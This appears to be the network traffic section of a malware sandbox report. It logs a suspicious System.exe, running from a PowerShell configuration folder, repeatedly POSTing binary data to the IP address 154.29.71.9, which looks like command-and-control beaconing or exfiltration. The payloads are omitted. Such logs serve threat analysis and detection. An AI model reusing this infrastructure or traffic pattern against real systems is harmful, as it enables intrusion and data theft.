Jan 4, 2025 14:53:48.503065109 CET  25  IN  HTTP/1.1 100 Continue
Jan 4, 2025 14:53:48.631953955 CET  200  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:48 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
117  192.168.2.4  50124  154.29.71.9  80  5796  C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp  Bytes transferred  Direction  Data
Jan 4, 2025 14:53:48.758260012 CET  395  OUT  POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
118  192.168.2.4  50125  154.29.71.9  80  5796  C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp  Bytes transferred  Direction  Data
Jan 4, 2025 14:53:49.186311007 CET  395  OUT  POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1876
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
Jan 4, 2025 14:53:49.712579966 CET  25  IN  HTTP/1.1 100 Continue
Jan 4, 2025 14:53:49.843954086 CET  349  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:49 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
119  192.168.2.4  50126  154.29.71.9  80  5796  C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp  Bytes transferred  Direction  Data
Jan 4, 2025 14:53:49.401365995 CET  395  OUT  POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
Jan 4, 2025 14:53:49.928044081 CET  25  IN  HTTP/1.1 100 Continue
Jan 4, 2025 14:53:50.064059973 CET  200  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:49 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
120  192.168.2.4  50127  154.29.71.9  80  5796  C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp  Bytes transferred  Direction  Data
Jan 4, 2025 14:53:50.201262951 CET  371  OUT  POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
Jan 4, 2025 14:53:50.743530035 CET  25  IN  HTTP/1.1 100 Continue
Jan 4, 2025 14:53:50.874169111 CET  200  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:50 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
121  192.168.2.4  50128  154.29.71.9  80  5796  C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp  Bytes transferred  Direction  Data
Jan 4, 2025 14:53:51.071003914 CET  395  OUT  POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2592
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:51.650032997 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:51.840229988 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:51 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    122 | 192.168.2.4 | 50129 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:52.019217014 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:52.667819023 CET | 225 | IN | HTTP/1.1 100 Continue
                                                                                                    Data Ascii: HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:52 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    123 | 192.168.2.4 | 50130 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:52.791860104 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:53.309509039 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:53.438247919 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:53 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    124 | 192.168.2.4 | 50131 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:53.570911884 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:54.110147953 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:54.239907980 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:54 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    125 | 192.168.2.4 | 50132 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:54.367248058 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    126 | 192.168.2.4 | 50133 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:54.854988098 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1876
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:55.437653065 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:55.581074953 CET | 349 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:55 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    127 | 192.168.2.4 | 50134 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:55.256119967 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:55.786510944 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:55.915925980 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:55 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    128 | 192.168.2.4 | 50135 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:56.040282965 CET | 371 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:53:56.589436054 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:56.723822117 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:56 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    129 | 192.168.2.4 | 50136 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:56.849648952 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:57.396044970 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:57.531883955 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:57 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    130 | 192.168.2.4 | 50137 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:57.700385094 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:58.236494064 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:58.371181965 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:58 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    131 | 192.168.2.4 | 50138 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:58.506654978 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:58.863821983 CET | 2600 | OUT | Data Raw: [payload omitted]
                                                                                                    Jan 4, 2025 14:53:59.052061081 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:59.187757015 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:58 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    132 | 192.168.2.4 | 50139 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:59.398880005 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:59.754451990 CET | 2600 | OUT | Data Raw: [payload omitted]
                                                                                                    Jan 4, 2025 14:53:59.927660942 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:54:00.058289051 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:59 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    133 | 192.168.2.4 | 50140 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:54:00.185419083 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:54:00.562135935 CET | 2600 | OUT | Data Raw: [payload omitted]


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    134 | 192.168.2.4 | 50141 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:54:00.622004986 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1876
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:54:00.973397970 CET | 1876 | OUT | Data Raw: [payload omitted]
                                                                                                    Jan 4, 2025 14:54:01.150546074 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:54:01.284154892 CET | 349 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:54:01 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: [payload omitted]


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    135 | 192.168.2.4 | 50142 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:54:00.883660078 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:54:01.238934040 CET | 2600 | OUT | Data Raw: [payload omitted]
                                                                                                    Jan 4, 2025 14:54:01.428970098 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:54:01.563954115 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:54:01 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    136 | 192.168.2.4 | 50143 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:54:01.699866056 CET | 371 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:54:02.052293062 CET | 2600 | OUT | Data Raw: [payload omitted]
                                                                                                    Jan 4, 2025 14:54:02.342279911 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:54:02.476561069 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:54:02 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    137 | 192.168.2.4 | 50144 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:54:02.610212088 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:54:02.958384037 CET | 2600 | OUT | Data Raw: [payload omitted]
                                                                                                    Jan 4, 2025 14:54:03.146261930 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:54:03.282156944 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:54:03 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
